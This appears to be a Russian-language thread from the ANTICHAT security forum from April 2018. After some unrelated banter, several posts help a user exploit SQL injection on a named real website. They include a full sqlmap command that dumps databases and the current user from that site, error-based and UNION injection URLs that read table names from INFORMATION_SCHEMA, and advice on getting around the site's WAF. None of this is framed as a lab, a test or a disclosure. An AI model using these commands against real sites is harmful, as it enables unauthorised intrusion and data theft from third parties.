HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2281  
Старый 07.04.2018, 18:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от 17919  
17919 said:

как аккаунт вк открыть?
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
 
Ответить с цитированием

  #2282  
Старый 07.04.2018, 21:10
17919
Guest
Сообщений: n/a
Провел на форуме:
4086

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:

судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
с чего такой детский вывод?
 
Ответить с цитированием

  #2283  
Старый 08.04.2018, 00:53
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию

Цитата:
Сообщение от 17919  
17919 said:

с чего такой детский вывод?
Цитата:
 
Ответить с цитированием

  #2284  
Старый 08.04.2018, 21:27
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию

хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...

опять же это то, что из открытого
 
Ответить с цитированием

  #2285  
Старый 10.04.2018, 03:29
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Vip77  
Vip77 said:


похоже на WAF

попробуй --current-user

бывает такое что базу не достает, но пользователя бд читает.

еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
 
Ответить с цитированием

  #2286  
Старый 17.04.2018, 00:03
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

нмап не может раскрутить скулу

.SpoilerTarget" type="button">Spoiler: 2
sqlmap -u http://wellaprof.elle.ru/competition...=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.

Ручками так выходит ошибка:

Incorrect usage of UNION and ORDER BY

Проблема в фильтрации или на самом деле скули там нет?
 
Ответить с цитированием

  #2287  
Старый 17.04.2018, 00:41
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
Скуля там есть это 100%

по ошибке всё ясно там может waf стоит ща сам гляну
 
Ответить с цитированием

  #2288  
Старый 17.04.2018, 00:44
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
http://wellaprof.elle.ru/competitio...R(101),CHAR(109),CHAR(109),CHAR(97))) ),1)-- 1
 
Ответить с цитированием

  #2289  
Старый 17.04.2018, 01:17
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #2290  
Старый 17.04.2018, 01:56
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

И почему не работает запрос, он же верный по своей структуре?

.SpoilerTarget" type="button">Spoiler: 1
http://wellaprof.elle.ru/competitio...(),concat(0x3a,CONCAT(AES_DECRYPT(AES _ENCRYPT(TABLE_NAME,0x71),0x71))))%2c1)+FROM+INFORMATION_SCHEMA.TABLES%20--%202
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ